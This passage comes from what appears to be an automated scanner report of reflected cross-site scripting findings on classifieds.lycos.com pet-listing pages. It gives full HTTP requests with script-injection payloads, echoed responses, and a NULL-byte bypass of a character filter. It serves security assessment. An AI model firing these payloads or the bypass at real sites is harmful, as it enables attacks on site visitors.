<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-cat/?ae787"><script>alert(1)</script>ab025033532=1&mobile=1" rel="nofollow">
...[SNIP]...

1.130. http://classifieds.lycos.com/sale-pet-dog/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a03f9"><script>alert(1)</script>de74cd9b04f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-doga03f9"><script>alert(1)</script>de74cd9b04f/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:47 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-doga03f9"><script>alert(1)</script>de74cd9b04f/?mobile=1" rel="nofollow">
...[SNIP]...

1.131. http://classifieds.lycos.com/sale-pet-dog/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc571"><script>alert(1)</script>0c857962aee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog/?cc571"><script>alert(1)</script>0c857962aee=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:04:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/?cc571"><script>alert(1)</script>0c857962aee=1&mobile=1" rel="nofollow">
...[SNIP]...

1.132. http://classifieds.lycos.com/sale-pet-dog/12-week-old-boxer-puppies-2416167321 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/12-week-old-boxer-puppies-2416167321

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fb30"><script>alert(1)</script>e061f61c48a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog9fb30"><script>alert(1)</script>e061f61c48a/12-week-old-boxer-puppies-2416167321 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:03:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:56 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog9fb30"><script>alert(1)</script>e061f61c48a/12-week-old-boxer-puppies-2416167321?mobile=1" rel="nofollow">
...[SNIP]...

1.133. http://classifieds.lycos.com/sale-pet-dog/12-week-old-boxer-puppies-2416167321 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/12-week-old-boxer-puppies-2416167321

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00103d3"><script>alert(1)</script>4422a66977f was submitted in the REST URL parameter 2. This input was echoed as 103d3"><script>alert(1)</script>4422a66977f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-pet-dog/12-week-old-boxer-puppies-2416167321%00103d3"><script>alert(1)</script>4422a66977f HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:37 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/12-week-old-boxer-puppies-2416167321%00103d3"><script>alert(1)</script>4422a66977f?mobile=1" rel="nofollow">
...[SNIP]...

1.134. http://classifieds.lycos.com/sale-pet-dog/12-week-old-boxer-puppies-2416167321 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/12-week-old-boxer-puppies-2416167321

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3206"><script>alert(1)</script>261d836b86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog/12-week-old-boxer-puppies-2416167321?c3206"><script>alert(1)</script>261d836b86=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:33 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/
Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/12-week-old-boxer-puppies-2416167321?c3206"><script>alert(1)</script>261d836b86=1&mobile=1" rel="nofollow">
...[SNIP]...

1.135. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416163730 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/cute-english-bulldog-puppies-2416163730

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b83b1"><script>alert(1)</script>1d6589b91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dogb83b1"><script>alert(1)</script>1d6589b91/cute-english-bulldog-puppies-2416163730 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:10 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dogb83b1"><script>alert(1)</script>1d6589b91/cute-english-bulldog-puppies-2416163730?mobile=1" rel="nofollow">
...[SNIP]...

1.136. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416163730 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/cute-english-bulldog-puppies-2416163730

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0034b07"><script>alert(1)</script>46ce0917467 was submitted in the REST URL parameter 2. This input was echoed as 34b07"><script>alert(1)</script>46ce0917467 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-pet-dog/cute-english-bulldog-puppies-2416163730%0034b07"><script>alert(1)</script>46ce0917467 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:41 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/cute-english-bulldog-puppies-2416163730%0034b07"><script>alert(1)</script>46ce0917467?mobile=1" rel="nofollow">
...[SNIP]...

1.137. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416163730 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/cute-english-bulldog-puppies-2416163730

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e64d"><script>alert(1)</script>505d3fe4c42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog/cute-english-bulldog-puppies-2416163730?8e64d"><script>alert(1)</script>505d3fe4c42=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:38 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/
Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/cute-english-bulldog-puppies-2416163730?8e64d"><script>alert(1)</script>505d3fe4c42=1&mobile=1" rel="nofollow">
...[SNIP]...

1.138. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416171986 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/cute-english-bulldog-puppies-2416171986

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf88"><script>alert(1)</script>840e3c3ce1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog9cf88"><script>alert(1)</script>840e3c3ce1/cute-english-bulldog-puppies-2416171986 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog9cf88"><script>alert(1)</script>840e3c3ce1/cute-english-bulldog-puppies-2416171986?mobile=1" rel="nofollow">
...[SNIP]...

1.139. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416171986 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/cute-english-bulldog-puppies-2416171986

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004af5c"><script>alert(1)</script>54c8442343a was submitted in the REST URL parameter 2. This input was echoed as 4af5c"><script>alert(1)</script>54c8442343a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-pet-dog/cute-english-bulldog-puppies-2416171986%004af5c"><script>alert(1)</script>54c8442343a HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/cute-english-bulldog-puppies-2416171986%004af5c"><script>alert(1)</script>54c8442343a?mobile=1" rel="nofollow">
...[SNIP]...

1.140. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416171986 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/cute-english-bulldog-puppies-2416171986

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b318a"><script>alert(1)</script>f1eb897387b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog/cute-english-bulldog-puppies-2416171986?b318a"><script>alert(1)</script>f1eb897387b=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:15 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/
Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/cute-english-bulldog-puppies-2416171986?b318a"><script>alert(1)</script>f1eb897387b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.141. http://classifieds.lycos.com/sale-pet-dog/healthy-english-bulldog-puppies-2416171752 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/healthy-english-bulldog-puppies-2416171752

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e47d"><script>alert(1)</script>3e3b210a263 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog1e47d"><script>alert(1)</script>3e3b210a263/healthy-english-bulldog-puppies-2416171752 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:03:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:54 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog1e47d"><script>alert(1)</script>3e3b210a263/healthy-english-bulldog-puppies-2416171752?mobile=1" rel="nofollow">
...[SNIP]...

1.142. http://classifieds.lycos.com/sale-pet-dog/healthy-english-bulldog-puppies-2416171752 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/healthy-english-bulldog-puppies-2416171752

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c2c49"><script>alert(1)</script>939ac719ce9 was submitted in the REST URL parameter 2. This input was echoed as c2c49"><script>alert(1)</script>939ac719ce9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-pet-dog/healthy-english-bulldog-puppies-2416171752%00c2c49"><script>alert(1)</script>939ac719ce9 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:31 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/healthy-english-bulldog-puppies-2416171752%00c2c49"><script>alert(1)</script>939ac719ce9?mobile=1" rel="nofollow">
...[SNIP]...

1.143. http://classifieds.lycos.com/sale-pet-dog/healthy-english-bulldog-puppies-2416171752 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/healthy-english-bulldog-puppies-2416171752

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b055e"><script>alert(1)</script>edd94c248b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog/healthy-english-bulldog-puppies-2416171752?b055e"><script>alert(1)</script>edd94c248b7=1 HTTP/1.1
